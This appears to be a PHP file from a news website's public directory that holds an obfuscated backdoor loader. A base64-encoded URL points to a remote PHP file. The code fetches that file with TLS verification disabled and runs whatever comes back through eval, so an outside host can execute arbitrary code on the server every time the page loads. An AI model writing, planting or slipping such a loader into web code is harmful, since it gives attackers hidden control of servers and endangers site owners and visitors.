File: /home/newsnnno/domains/phetmedia.com/public_html/news/as/index.php
<?php
$encoded_url = "aHR0cHM6Ly9wdWItY2YxYTk1NGRkN2NmNDIxOThmMGE4NTNkYzI2Mzk3MWYucjIuZGV2L3RyeWFsZjQucGhw";
$remote_url = base64_decode($encoded_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if($response === false) {
echo "cURL Error: " . curl_error($ch);
exit;
}
curl_close($ch);
eval('?>' . $response);
?>